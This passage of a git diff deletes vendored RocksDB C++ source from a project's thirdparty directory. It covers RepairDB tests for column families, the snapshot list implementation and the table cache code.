-    ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-    ASSERT_EQ(wal_files.size(), 1);
-    uint64_t total_ssts_size;
-    GetAllSSTFiles(&total_ssts_size);
-    ASSERT_EQ(total_ssts_size, 0);
-    std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-    Close();
-    ASSERT_OK(env_->FileExists(manifest_path));
-    ASSERT_OK(env_->DeleteFile(manifest_path));
-    ASSERT_OK(RepairDB(dbname_, options));
-
-    // make sure that all WALs are converted to SSTables.
-    options.wal_dir = "";
-
-    Reopen(options);
-    ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-    ASSERT_EQ(wal_files.size(), 0);
-    GetAllSSTFiles(&total_ssts_size);
-    ASSERT_GT(total_ssts_size, 0);
-    ASSERT_EQ(Get("key"), "val");
-    ASSERT_EQ(Get("foo"), "bar");
-
- } while(ChangeWalOptions());
-}
-
-TEST_F(RepairTest, RepairMultipleColumnFamilies) {
-  // Verify repair logic associates SST files with their original column
-  // families.
-  const int kNumCfs = 3;
-  const int kEntriesPerCf = 2;
-  DestroyAndReopen(CurrentOptions());
-  CreateAndReopenWithCF({"pikachu1", "pikachu2"}, CurrentOptions());
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      Put(i, "key" + ToString(j), "val" + ToString(j));
-      if (j == kEntriesPerCf - 1 && i == kNumCfs - 1) {
-        // Leave one unflushed so we can verify WAL entries are properly
-        // associated with column families.
-        continue;
-      }
-      Flush(i);
-    }
-  }
-
-  // Need to get path before Close() deletes db_, but delete it after Close() to
-  // ensure Close() doesn't re-create the manifest.
-  std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-  Close();
-  ASSERT_OK(env_->FileExists(manifest_path));
-  ASSERT_OK(env_->DeleteFile(manifest_path));
-
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-
-  ReopenWithColumnFamilies({"default", "pikachu1", "pikachu2"},
-                           CurrentOptions());
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      ASSERT_EQ(Get(i, "key" + ToString(j)), "val" + ToString(j));
-    }
-  }
-}
-
-TEST_F(RepairTest, RepairColumnFamilyOptions) {
-  // Verify repair logic uses correct ColumnFamilyOptions when repairing a
-  // database with different options for column families.
-  const int kNumCfs = 2;
-  const int kEntriesPerCf = 2;
-
-  Options opts(CurrentOptions()), rev_opts(CurrentOptions());
-  opts.comparator = BytewiseComparator();
-  rev_opts.comparator = ReverseBytewiseComparator();
-
-  DestroyAndReopen(opts);
-  CreateColumnFamilies({"reverse"}, rev_opts);
-  ReopenWithColumnFamilies({"default", "reverse"},
-                           std::vector<Options>{opts, rev_opts});
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      Put(i, "key" + ToString(j), "val" + ToString(j));
-      if (i == kNumCfs - 1 && j == kEntriesPerCf - 1) {
-        // Leave one unflushed so we can verify RepairDB's flush logic
-        continue;
-      }
-      Flush(i);
-    }
-  }
-  Close();
-
-  // RepairDB() records the comparator in the manifest, and DB::Open would fail
-  // if a different comparator were used.
-  ASSERT_OK(RepairDB(dbname_, opts, {{"default", opts}, {"reverse", rev_opts}},
-                     opts /* unknown_cf_opts */));
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "reverse"},
-                                        std::vector<Options>{opts, rev_opts}));
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      ASSERT_EQ(Get(i, "key" + ToString(j)), "val" + ToString(j));
-    }
-  }
-
-  // Examine table properties to verify RepairDB() used the right options when
-  // converting WAL->SST
-  TablePropertiesCollection fname_to_props;
-  db_->GetPropertiesOfAllTables(handles_[1], &fname_to_props);
-  ASSERT_EQ(fname_to_props.size(), 2U);
-  for (const auto& fname_and_props : fname_to_props) {
-    std::string comparator_name (
-      InternalKeyComparator(rev_opts.comparator).Name());
-    comparator_name = comparator_name.substr(comparator_name.find(':') + 1);
-    ASSERT_EQ(comparator_name,
-              fname_and_props.second->comparator_name);
-  }
-
-  // Also check comparator when it's provided via "unknown" CF options
-  ASSERT_OK(RepairDB(dbname_, opts, {{"default", opts}},
-                     rev_opts /* unknown_cf_opts */));
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "reverse"},
-                                        std::vector<Options>{opts, rev_opts}));
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      ASSERT_EQ(Get(i, "key" + ToString(j)), "val" + ToString(j));
-    }
-  }
-}
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as RepairDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/snapshot_impl.cc b/thirdparty/rocksdb/db/snapshot_impl.cc
deleted file mode 100644
index 032ef39..0000000
--- a/thirdparty/rocksdb/db/snapshot_impl.cc
+++ /dev/null
@@ -1,26 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/snapshot.h"
-
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-ManagedSnapshot::ManagedSnapshot(DB* db) : db_(db),
-                                           snapshot_(db->GetSnapshot()) {}
-
-ManagedSnapshot::ManagedSnapshot(DB* db, const Snapshot* _snapshot)
-    : db_(db), snapshot_(_snapshot) {}
-
-ManagedSnapshot::~ManagedSnapshot() {
-  if (snapshot_) {
-    db_->ReleaseSnapshot(snapshot_);
-  }
-}
-
-const Snapshot* ManagedSnapshot::snapshot() { return snapshot_;}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/snapshot_impl.h b/thirdparty/rocksdb/db/snapshot_impl.h
deleted file mode 100644
index 7dc4059..0000000
--- a/thirdparty/rocksdb/db/snapshot_impl.h
+++ /dev/null
@@ -1,151 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <vector>
-
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-class SnapshotList;
-
-// Snapshots are kept in a doubly-linked list in the DB.
-// Each SnapshotImpl corresponds to a particular sequence number.
-class SnapshotImpl : public Snapshot {
- public:
-  SequenceNumber number_;  // const after creation
-
-  virtual SequenceNumber GetSequenceNumber() const override { return number_; }
-
- private:
-  friend class SnapshotList;
-
-  // SnapshotImpl is kept in a doubly-linked circular list
-  SnapshotImpl* prev_;
-  SnapshotImpl* next_;
-
-  SnapshotList* list_;                 // just for sanity checks
-
-  int64_t unix_time_;
-
-  // Will this snapshot be used by a Transaction to do write-conflict checking?
-  bool is_write_conflict_boundary_;
-};
-
-class SnapshotList {
- public:
-  SnapshotList() {
-    list_.prev_ = &list_;
-    list_.next_ = &list_;
-    list_.number_ = 0xFFFFFFFFL;      // placeholder marker, for debugging
-    count_ = 0;
-  }
-
-  bool empty() const { return list_.next_ == &list_; }
-  SnapshotImpl* oldest() const { assert(!empty()); return list_.next_; }
-  SnapshotImpl* newest() const { assert(!empty()); return list_.prev_; }
-
-  const SnapshotImpl* New(SnapshotImpl* s, SequenceNumber seq,
-                          uint64_t unix_time, bool is_write_conflict_boundary) {
-    s->number_ = seq;
-    s->unix_time_ = unix_time;
-    s->is_write_conflict_boundary_ = is_write_conflict_boundary;
-    s->list_ = this;
-    s->next_ = &list_;
-    s->prev_ = list_.prev_;
-    s->prev_->next_ = s;
-    s->next_->prev_ = s;
-    count_++;
-    return s;
-  }
-
-  // Do not responsible to free the object.
-  void Delete(const SnapshotImpl* s) {
-    assert(s->list_ == this);
-    s->prev_->next_ = s->next_;
-    s->next_->prev_ = s->prev_;
-    count_--;
-  }
-
-  // retrieve all snapshot numbers up until max_seq. They are sorted in
-  // ascending order.
-  std::vector<SequenceNumber> GetAll(
-      SequenceNumber* oldest_write_conflict_snapshot = nullptr,
-      const SequenceNumber& max_seq = kMaxSequenceNumber) const {
-    std::vector<SequenceNumber> ret;
-
-    if (oldest_write_conflict_snapshot != nullptr) {
-      *oldest_write_conflict_snapshot = kMaxSequenceNumber;
-    }
-
-    if (empty()) {
-      return ret;
-    }
-    const SnapshotImpl* s = &list_;
-    while (s->next_ != &list_) {
-      if (s->next_->number_ > max_seq) {
-        break;
-      }
-      ret.push_back(s->next_->number_);
-
-      if (oldest_write_conflict_snapshot != nullptr &&
-          *oldest_write_conflict_snapshot == kMaxSequenceNumber &&
-          s->next_->is_write_conflict_boundary_) {
-        // If this is the first write-conflict boundary snapshot in the list,
-        // it is the oldest
-        *oldest_write_conflict_snapshot = s->next_->number_;
-      }
-
-      s = s->next_;
-    }
-    return ret;
-  }
-
-  // Whether there is an active snapshot in range [lower_bound, upper_bound).
-  bool HasSnapshotInRange(SequenceNumber lower_bound,
-                          SequenceNumber upper_bound) {
-    if (empty()) {
-      return false;
-    }
-    const SnapshotImpl* s = &list_;
-    while (s->next_ != &list_) {
-      if (s->next_->number_ >= lower_bound) {
-        return s->next_->number_ < upper_bound;
-      }
-      s = s->next_;
-    }
-    return false;
-  }
-
-  // get the sequence number of the most recent snapshot
-  SequenceNumber GetNewest() {
-    if (empty()) {
-      return 0;
-    }
-    return newest()->number_;
-  }
-
-  int64_t GetOldestSnapshotTime() const {
-    if (empty()) {
-      return 0;
-    } else {
-      return oldest()->unix_time_;
-    }
-  }
-
-  uint64_t count() const { return count_; }
-
- private:
-  // Dummy head of doubly-linked list of snapshots
-  SnapshotImpl list_;
-  uint64_t count_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_cache.cc b/thirdparty/rocksdb/db/table_cache.cc
deleted file mode 100644
index b4d5cc1..0000000
--- a/thirdparty/rocksdb/db/table_cache.cc
+++ /dev/null
@@ -1,472 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/table_cache.h"
-
-#include "db/dbformat.h"
-#include "db/version_edit.h"
-#include "util/filename.h"
-
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/statistics.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/iterator_wrapper.h"
-#include "table/table_builder.h"
-#include "table/table_reader.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-namespace {
-
-template <class T>
-static void DeleteEntry(const Slice& key, void* value) {
-  T* typed_value = reinterpret_cast<T*>(value);
-  delete typed_value;
-}
-
-static void UnrefEntry(void* arg1, void* arg2) {
-  Cache* cache = reinterpret_cast<Cache*>(arg1);
-  Cache::Handle* h = reinterpret_cast<Cache::Handle*>(arg2);
-  cache->Release(h);
-}
-
-static void DeleteTableReader(void* arg1, void* arg2) {
-  TableReader* table_reader = reinterpret_cast<TableReader*>(arg1);
-  delete table_reader;
-}
-
-static Slice GetSliceForFileNumber(const uint64_t* file_number) {
-  return Slice(reinterpret_cast<const char*>(file_number),
-               sizeof(*file_number));
-}
-
-#ifndef ROCKSDB_LITE
-
-void AppendVarint64(IterKey* key, uint64_t v) {
-  char buf[10];
-  auto ptr = EncodeVarint64(buf, v);
-  key->TrimAppend(key->Size(), buf, ptr - buf);
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace
-
-TableCache::TableCache(const ImmutableCFOptions& ioptions,
-                       const EnvOptions& env_options, Cache* const cache)
-    : ioptions_(ioptions), env_options_(env_options), cache_(cache) {
-  if (ioptions_.row_cache) {
-    // If the same cache is shared by multiple instances, we need to
-    // disambiguate its entries.
-    PutVarint64(&row_cache_id_, ioptions_.row_cache->NewId());
-  }
-}
-
-TableCache::~TableCache() {
-}
-
-TableReader* TableCache::GetTableReaderFromHandle(Cache::Handle* handle) {
-  return reinterpret_cast<TableReader*>(cache_->Value(handle));
-}
-
-void TableCache::ReleaseHandle(Cache::Handle* handle) {
-  cache_->Release(handle);
-}
-
-Status TableCache::GetTableReader(
-    const EnvOptions& env_options,
-    const InternalKeyComparator& internal_comparator, const FileDescriptor& fd,
-    bool sequential_mode, size_t readahead, bool record_read_stats,
-    HistogramImpl* file_read_hist, unique_ptr<TableReader>* table_reader,
-    bool skip_filters, int level, bool prefetch_index_and_filter_in_cache,
-    bool for_compaction) {
-  std::string fname =
-      TableFileName(ioptions_.db_paths, fd.GetNumber(), fd.GetPathId());
-  unique_ptr<RandomAccessFile> file;
-  Status s = ioptions_.env->NewRandomAccessFile(fname, &file, env_options);
-
-  RecordTick(ioptions_.statistics, NO_FILE_OPENS);
-  if (s.ok()) {
-    if (readahead > 0) {
-      file = NewReadaheadRandomAccessFile(std::move(file), readahead);
-    }
-    if (!sequential_mode && ioptions_.advise_random_on_open) {
-      file->Hint(RandomAccessFile::RANDOM);
-    }
-    StopWatch sw(ioptions_.env, ioptions_.statistics, TABLE_OPEN_IO_MICROS);
-    std::unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(
-            std::move(file), fname, ioptions_.env,
-            record_read_stats ? ioptions_.statistics : nullptr, SST_READ_MICROS,
-            file_read_hist, ioptions_.rate_limiter, for_compaction));
-    s = ioptions_.table_factory->NewTableReader(
-        TableReaderOptions(ioptions_, env_options, internal_comparator,
-                           skip_filters, level),
-        std::move(file_reader), fd.GetFileSize(), table_reader,
-        prefetch_index_and_filter_in_cache);
-    TEST_SYNC_POINT("TableCache::GetTableReader:0");
-  }
-  return s;
-}
-
-void TableCache::EraseHandle(const FileDescriptor& fd, Cache::Handle* handle) {
-  ReleaseHandle(handle);
-  uint64_t number = fd.GetNumber();
-  Slice key = GetSliceForFileNumber(&number);
-  cache_->Erase(key);
-}
-
-Status TableCache::FindTable(const EnvOptions& env_options,
-                             const InternalKeyComparator& internal_comparator,
-                             const FileDescriptor& fd, Cache::Handle** handle,
-                             const bool no_io, bool record_read_stats,
-                             HistogramImpl* file_read_hist, bool skip_filters,
-                             int level,
-                             bool prefetch_index_and_filter_in_cache) {
-  PERF_TIMER_GUARD(find_table_nanos);
-  Status s;
-  uint64_t number = fd.GetNumber();
-  Slice key = GetSliceForFileNumber(&number);
-  *handle = cache_->Lookup(key);
-  TEST_SYNC_POINT_CALLBACK("TableCache::FindTable:0",
-                           const_cast<bool*>(&no_io));
-
-  if (*handle == nullptr) {
-    if (no_io) {  // Don't do IO and return a not-found status
-      return Status::Incomplete("Table not found in table_cache, no_io is set");
-    }
-    unique_ptr<TableReader> table_reader;
-    s = GetTableReader(env_options, internal_comparator, fd,
-                       false /* sequential mode */, 0 /* readahead */,
-                       record_read_stats, file_read_hist, &table_reader,
-                       skip_filters, level, prefetch_index_and_filter_in_cache);
-    if (!s.ok()) {
-      assert(table_reader == nullptr);
-      RecordTick(ioptions_.statistics, NO_FILE_ERRORS);
-      // We do not cache error results so that if the error is transient,
-      // or somebody repairs the file, we recover automatically.
-    } else {
-      s = cache_->Insert(key, table_reader.get(), 1, &DeleteEntry<TableReader>,
-                         handle);
-      if (s.ok()) {
-        // Release ownership of table reader.
-        table_reader.release();
-      }
-    }
-  }
-  return s;
-}
-
-InternalIterator* TableCache::NewIterator(
-    const ReadOptions& options, const EnvOptions& env_options,
-    const InternalKeyComparator& icomparator, const FileDescriptor& fd,
-    RangeDelAggregator* range_del_agg, TableReader** table_reader_ptr,
-    HistogramImpl* file_read_hist, bool for_compaction, Arena* arena,
-    bool skip_filters, int level) {
-  PERF_TIMER_GUARD(new_table_iterator_nanos);
-
-  Status s;
-  bool create_new_table_reader = false;
-  TableReader* table_reader = nullptr;
-  Cache::Handle* handle = nullptr;
-  if (s.ok()) {
-    if (table_reader_ptr != nullptr) {
-      *table_reader_ptr = nullptr;
-    }
-    size_t readahead = 0;
-    if (for_compaction) {
-#ifndef NDEBUG
-      bool use_direct_reads_for_compaction = env_options.use_direct_reads;
-      TEST_SYNC_POINT_CALLBACK("TableCache::NewIterator:for_compaction",
-                               &use_direct_reads_for_compaction);
-#endif  // !NDEBUG
-      if (ioptions_.new_table_reader_for_compaction_inputs) {
-        readahead = ioptions_.compaction_readahead_size;
-        create_new_table_reader = true;
-      }
-    } else {
-      readahead = options.readahead_size;
-      create_new_table_reader = readahead > 0;
-    }
-
-    if (create_new_table_reader) {
-      unique_ptr<TableReader> table_reader_unique_ptr;
-      s = GetTableReader(
-          env_options, icomparator, fd, true /* sequential_mode */, readahead,
-          !for_compaction /* record stats */, nullptr, &table_reader_unique_ptr,
-          false /* skip_filters */, level,
-          true /* prefetch_index_and_filter_in_cache */, for_compaction);
-      if (s.ok()) {
-        table_reader = table_reader_unique_ptr.release();
-      }
-    } else {
-      table_reader = fd.table_reader;
-      if (table_reader == nullptr) {
-        s = FindTable(env_options, icomparator, fd, &handle,
-                      options.read_tier == kBlockCacheTier /* no_io */,
-                      !for_compaction /* record read_stats */, file_read_hist,
-                      skip_filters, level);
-        if (s.ok()) {
-          table_reader = GetTableReaderFromHandle(handle);
-        }
-      }
-    }
-  }
-  InternalIterator* result = nullptr;
-  if (s.ok()) {
-    result = table_reader->NewIterator(options, arena, skip_filters);
-    if (create_new_table_reader) {
-      assert(handle == nullptr);
-      result->RegisterCleanup(&DeleteTableReader, table_reader, nullptr);
-    } else if (handle != nullptr) {
-      result->RegisterCleanup(&UnrefEntry, cache_, handle);
-      handle = nullptr;  // prevent from releasing below
-    }
-
-    if (for_compaction) {
-      table_reader->SetupForCompaction();
-    }
-    if (table_reader_ptr != nullptr) {
-      *table_reader_ptr = table_reader;
-    }
-  }
-  if (s.ok() && range_del_agg != nullptr && !options.ignore_range_deletions) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        table_reader->NewRangeTombstoneIterator(options));
-    if (range_del_iter != nullptr) {
-      s = range_del_iter->status();
-    }
-    if (s.ok()) {
-      s = range_del_agg->AddTombstones(std::move(range_del_iter));
-    }
-  }
-
-  if (handle != nullptr) {
-    ReleaseHandle(handle);
-  }
-  if (!s.ok()) {
-    assert(result == nullptr);
-    result = NewErrorInternalIterator(s, arena);
-  }
-  return result;
-}
-
-InternalIterator* TableCache::NewRangeTombstoneIterator(
-    const ReadOptions& options, const EnvOptions& env_options,
-    const InternalKeyComparator& icomparator, const FileDescriptor& fd,
-    HistogramImpl* file_read_hist, bool skip_filters, int level) {
-  Status s;
-  TableReader* table_reader = nullptr;
-  Cache::Handle* handle = nullptr;
-  table_reader = fd.table_reader;
-  if (table_reader == nullptr) {
-    s = FindTable(env_options, icomparator, fd, &handle,
-                  options.read_tier == kBlockCacheTier /* no_io */,
-                  true /* record read_stats */, file_read_hist, skip_filters,
-                  level);
-    if (s.ok()) {
-      table_reader = GetTableReaderFromHandle(handle);
-    }
-  }
-  InternalIterator* result = nullptr;
-  if (s.ok()) {
-    result = table_reader->NewRangeTombstoneIterator(options);
-    if (result != nullptr) {
-      if (handle != nullptr) {
-        result->RegisterCleanup(&UnrefEntry, cache_, handle);
-      }
-    }
-  }
-  if (result == nullptr && handle != nullptr) {
-    // the range deletion block didn't exist, or there was a failure between
-    // getting handle and getting iterator.
-    ReleaseHandle(handle);
-  }
-  if (!s.ok()) {
-    assert(result == nullptr);
-    result = NewErrorInternalIterator(s);
-  }
-  return result;
-}
-
-Status TableCache::Get(const ReadOptions& options,
-                       const InternalKeyComparator& internal_comparator,
-                       const FileDescriptor& fd, const Slice& k,
-                       GetContext* get_context, HistogramImpl* file_read_hist,
-                       bool skip_filters, int level) {
-  std::string* row_cache_entry = nullptr;
-  bool done = false;
-#ifndef ROCKSDB_LITE
-  IterKey row_cache_key;
-  std::string row_cache_entry_buffer;
-
-  // Check row cache if enabled. Since row cache does not currently store
-  // sequence numbers, we cannot use it if we need to fetch the sequence.
-  if (ioptions_.row_cache && !get_context->NeedToReadSequence()) {
-    uint64_t fd_number = fd.GetNumber();
-    auto user_key = ExtractUserKey(k);
-    // We use the user key as cache key instead of the internal key,
-    // otherwise the whole cache would be invalidated every time the
-    // sequence key increases. However, to support caching snapshot
-    // reads, we append the sequence number (incremented by 1 to
-    // distinguish from 0) only in this case.
-    uint64_t seq_no =
-        options.snapshot == nullptr ? 0 : 1 + GetInternalKeySeqno(k);
-
-    // Compute row cache key.
-    row_cache_key.TrimAppend(row_cache_key.Size(), row_cache_id_.data(),
-                             row_cache_id_.size());
-    AppendVarint64(&row_cache_key, fd_number);
-    AppendVarint64(&row_cache_key, seq_no);
-    row_cache_key.TrimAppend(row_cache_key.Size(), user_key.data(),
-                             user_key.size());
-
-    if (auto row_handle =
-            ioptions_.row_cache->Lookup(row_cache_key.GetUserKey())) {
-      // Cleanable routine to release the cache entry
-      Cleanable value_pinner;
-      auto release_cache_entry_func = [](void* cache_to_clean,
-                                         void* cache_handle) {
-        ((Cache*)cache_to_clean)->Release((Cache::Handle*)cache_handle);
-      };
-      auto found_row_cache_entry = static_cast<const std::string*>(
-          ioptions_.row_cache->Value(row_handle));
-      // If it comes here value is located on the cache.
-      // found_row_cache_entry points to the value on cache,
-      // and value_pinner has cleanup procedure for the cached entry.
-      // After replayGetContextLog() returns, get_context.pinnable_slice_
-      // will point to cache entry buffer (or a copy based on that) and
-      // cleanup routine under value_pinner will be delegated to
-      // get_context.pinnable_slice_. Cache entry is released when
-      // get_context.pinnable_slice_ is reset.
-      value_pinner.RegisterCleanup(release_cache_entry_func,
-                                   ioptions_.row_cache.get(), row_handle);
-      replayGetContextLog(*found_row_cache_entry, user_key, get_context,
-                          &value_pinner);
-      RecordTick(ioptions_.statistics, ROW_CACHE_HIT);
-      done = true;
-    } else {
-      // Not found, setting up the replay log.
-      RecordTick(ioptions_.statistics, ROW_CACHE_MISS);
-      row_cache_entry = &row_cache_entry_buffer;
-    }
-  }
-#endif  // ROCKSDB_LITE
-  Status s;
-  TableReader* t = fd.table_reader;
-  Cache::Handle* handle = nullptr;
-  if (!done && s.ok()) {
-    if (t == nullptr) {
-      s = FindTable(env_options_, internal_comparator, fd, &handle,
-                    options.read_tier == kBlockCacheTier /* no_io */,
-                    true /* record_read_stats */, file_read_hist, skip_filters,
-                    level);
-      if (s.ok()) {
-        t = GetTableReaderFromHandle(handle);
-      }
-    }
-    if (s.ok() && get_context->range_del_agg() != nullptr &&
-        !options.ignore_range_deletions) {
-      std::unique_ptr<InternalIterator> range_del_iter(
-          t->NewRangeTombstoneIterator(options));
-      if (range_del_iter != nullptr) {
-        s = range_del_iter->status();
-      }
-      if (s.ok()) {
-        s = get_context->range_del_agg()->AddTombstones(
-            std::move(range_del_iter));
-      }
-    }
-    if (s.ok()) {
-      get_context->SetReplayLog(row_cache_entry);  // nullptr if no cache.
-      s = t->Get(options, k, get_context, skip_filters);
-      get_context->SetReplayLog(nullptr);
-    } else if (options.read_tier == kBlockCacheTier && s.IsIncomplete()) {
-      // Couldn't find Table in cache but treat as kFound if no_io set
-      get_context->MarkKeyMayExist();
-      s = Status::OK();
-      done = true;
-    }
-  }
-
-#ifndef ROCKSDB_LITE
-  // Put the replay log in row cache only if something was found.
-  if (!done && s.ok() && row_cache_entry && !row_cache_entry->empty()) {
-    size_t charge =
-        row_cache_key.Size() + row_cache_entry->size() + sizeof(std::string);
-    void* row_ptr = new std::string(std::move(*row_cache_entry));
-    ioptions_.row_cache->Insert(row_cache_key.GetUserKey(), row_ptr, charge,
-                                &DeleteEntry<std::string>);
-  }
-#endif  // ROCKSDB_LITE
-
-  if (handle != nullptr) {
-    ReleaseHandle(handle);
-  }
-  return s;
-}
-
-Status TableCache::GetTableProperties(
-    const EnvOptions& env_options,
-    const InternalKeyComparator& internal_comparator, const FileDescriptor& fd,
-    std::shared_ptr<const TableProperties>* properties, bool no_io) {
-  Status s;
-  auto table_reader = fd.table_reader;
-  // table already been pre-loaded?
-  if (table_reader) {
-    *properties = table_reader->GetTableProperties();
-
-    return s;
-  }
-
-  Cache::Handle* table_handle = nullptr;
-  s = FindTable(env_options, internal_comparator, fd, &table_handle, no_io);
-  if (!s.ok()) {
-    return s;
-  }
-  assert(table_handle);
-  auto table = GetTableReaderFromHandle(table_handle);
-  *properties = table->GetTableProperties();
-  ReleaseHandle(table_handle);
-  return s;
-}
-
-size_t TableCache::GetMemoryUsageByTableReader(
-    const EnvOptions& env_options,
-    const InternalKeyComparator& internal_comparator,
-    const FileDescriptor& fd) {
-  Status s;
-  auto table_reader = fd.table_reader;
-  // table already been pre-loaded?
-  if (table_reader) {
-    return table_reader->ApproximateMemoryUsage();
-  }
-
-  Cache::Handle* table_handle = nullptr;
-  s = FindTable(env_options, internal_comparator, fd, &table_handle, true);
-  if (!s.ok()) {
-    return 0;
-  }
-  assert(table_handle);
-  auto table = GetTableReaderFromHandle(table_handle);
-  auto ret = table->ApproximateMemoryUsage();
-  ReleaseHandle(table_handle);
-  return ret;
-}
-
-void TableCache::Evict(Cache* cache, uint64_t file_number) {
-  cache->Erase(GetSliceForFileNumber(&file_number));
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_cache.h b/thirdparty/rocksdb/db/table_cache.h
deleted file mode 100644
index 8b65baf..0000000
--- a/thirdparty/rocksdb/db/table_cache.h
+++ /dev/null
@@ -1,146 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Thread-safe (provides internal synchronization)
-
-#pragma once
-#include <string>
-#include <vector>
-#include <stdint.h>
-
-#include "db/dbformat.h"
-#include "db/range_del_aggregator.h"
-#include "options/cf_options.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "table/table_reader.h"
-
-namespace rocksdb {
-
-class Env;
-class Arena;
-struct FileDescriptor;
-class GetContext;
-class HistogramImpl;
-class InternalIterator;
-
-class TableCache {
- public:
-  TableCache(const ImmutableCFOptions& ioptions,
-             const EnvOptions& storage_options, Cache* cache);
-  ~TableCache();
-
-  // Return an iterator for the specified file number (the corresponding
-  // file length must be exactly "file_size" bytes).  If "tableptr" is
-  // non-nullptr, also sets "*tableptr" to point to the Table object
-  // underlying the returned iterator, or nullptr if no Table object underlies
-  // the returned iterator.  The returned "*tableptr" object is owned by
-  // the cache and should not be deleted, and is valid for as long as the
-  // returned iterator is live.
-  // @param range_del_agg If non-nullptr, adds range deletions to the
-  //    aggregator. If an error occurs, returns it in a NewErrorInternalIterator
-  // @param skip_filters Disables loading/accessing the filter block
-  // @param level The level this table is at, -1 for "not set / don't know"
-  InternalIterator* NewIterator(
-      const ReadOptions& options, const EnvOptions& toptions,
-      const InternalKeyComparator& internal_comparator,
-      const FileDescriptor& file_fd, RangeDelAggregator* range_del_agg,
-      TableReader** table_reader_ptr = nullptr,
-      HistogramImpl* file_read_hist = nullptr, bool for_compaction = false,
-      Arena* arena = nullptr, bool skip_filters = false, int level = -1);
-
-  InternalIterator* NewRangeTombstoneIterator(
-      const ReadOptions& options, const EnvOptions& toptions,
-      const InternalKeyComparator& internal_comparator,
-      const FileDescriptor& file_fd, HistogramImpl* file_read_hist,
-      bool skip_filters, int level);
-
-  // If a seek to internal key "k" in specified file finds an entry,
-  // call (*handle_result)(arg, found_key, found_value) repeatedly until
-  // it returns false.
-  // @param get_context State for get operation. If its range_del_agg() returns
-  //    non-nullptr, adds range deletions to the aggregator. If an error occurs,
-  //    returns non-ok status.
-  // @param skip_filters Disables loading/accessing the filter block
-  // @param level The level this table is at, -1 for "not set / don't know"
-  Status Get(const ReadOptions& options,
-             const InternalKeyComparator& internal_comparator,
-             const FileDescriptor& file_fd, const Slice& k,
-             GetContext* get_context, HistogramImpl* file_read_hist = nullptr,
-             bool skip_filters = false, int level = -1);
-
-  // Evict any entry for the specified file number
-  static void Evict(Cache* cache, uint64_t file_number);
-
-  // Clean table handle and erase it from the table cache
-  // Used in DB close, or the file is not live anymore.
-  void EraseHandle(const FileDescriptor& fd, Cache::Handle* handle);
-
-  // Find table reader
-  // @param skip_filters Disables loading/accessing the filter block
-  // @param level == -1 means not specified
-  Status FindTable(const EnvOptions& toptions,
-                   const InternalKeyComparator& internal_comparator,
-                   const FileDescriptor& file_fd, Cache::Handle**,
-                   const bool no_io = false, bool record_read_stats = true,
-                   HistogramImpl* file_read_hist = nullptr,
-                   bool skip_filters = false, int level = -1,
-                   bool prefetch_index_and_filter_in_cache = true);
-
-  // Get TableReader from a cache handle.
